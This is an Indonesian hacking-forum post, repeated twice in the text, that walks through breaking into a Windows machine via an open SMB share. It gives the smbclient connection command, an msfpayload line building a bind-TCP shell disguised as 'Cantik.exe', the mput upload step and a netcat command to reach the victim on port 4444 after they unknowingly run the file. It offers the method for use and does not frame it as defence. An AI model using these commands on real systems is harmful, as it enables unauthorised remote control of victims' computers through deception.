12-03-2013, 04:51 PM
Dalam postingan sebelumnya http://indonesianbacktrack.or.id/forum/thread-5212.html
Saya sudah membahas bagaimana attacker dapat masuk ke directory korbannya melalui folder shared kemudian menjadikan smbclient sebagai perantara antara attacker dan clientnya dengan memanfaatkan port 445.
Namun dalam postingan kali saya saya akan membahas bagaimana si penyerang dapat memiliki hak akses penuh layaknya seorang admin yg dapat melakukan banyak hal dalam sistem operasi tersebut.
Equipments:
1. Smbclient
2. Metasploit
3. Netcat
melakukan koneksi ke host korban.
terlihat diatas korban memiliki 2 buah file dan satu buah folder.
tahap selanjutnya pembuatan payload yang nantinya akan di upload ke host korban.
selanjutnya mengupload payload kedalam host korban menggunakan perintah "mput"
Done, upload success =)
selanjutnya apa yg terjadi jika payload tersebut di eksekusi korban..???
Overview.
menggunakan Netcat untuk terhubung dengan host korban di port 4444
itulasan mengapa saya memilih pembuatan payload Bind Tcp, saat korban mengeksekusi file tanpa di sadari korban membuka jalan bagi attacker di port yg telah di tentukan. dengan begitu attacker dapat bebas keluar masuk ke host korban
source
Saya sudah membahas bagaimana attacker dapat masuk ke directory korbannya melalui folder shared kemudian menjadikan smbclient sebagai perantara antara attacker dan clientnya dengan memanfaatkan port 445.
Namun dalam postingan kali saya saya akan membahas bagaimana si penyerang dapat memiliki hak akses penuh layaknya seorang admin yg dapat melakukan banyak hal dalam sistem operasi tersebut.
Equipments:
1. Smbclient
2. Metasploit
3. Netcat
melakukan koneksi ke host korban.
Code:
# smbclient //targetIP/Shared\ Folder -U ComputerName -p port [445]
Spoiler! :
terlihat diatas korban memiliki 2 buah file dan satu buah folder.
tahap selanjutnya pembuatan payload yang nantinya akan di upload ke host korban.
Code:
#msfpayload windows/shell_bind_tcp LHOST=myIP LPORT=portListening X > Desktop/Cantik.exe
Spoiler! :
selanjutnya mengupload payload kedalam host korban menggunakan perintah "mput"
Code:
smb: \> mput Payload.exe
Spoiler! :
Done, upload success =)
selanjutnya apa yg terjadi jika payload tersebut di eksekusi korban..???
Overview.
menggunakan Netcat untuk terhubung dengan host korban di port 4444
Code:
# nc targetIP port [4444]
Spoiler! :
Spoiler! :
itulasan mengapa saya memilih pembuatan payload Bind Tcp, saat korban mengeksekusi file tanpa di sadari korban membuka jalan bagi attacker di port yg telah di tentukan. dengan begitu attacker dapat bebas keluar masuk ke host korban
source
Code:
Username : [ Hidemichi-Hiroyuki]
Password : [ ******** ]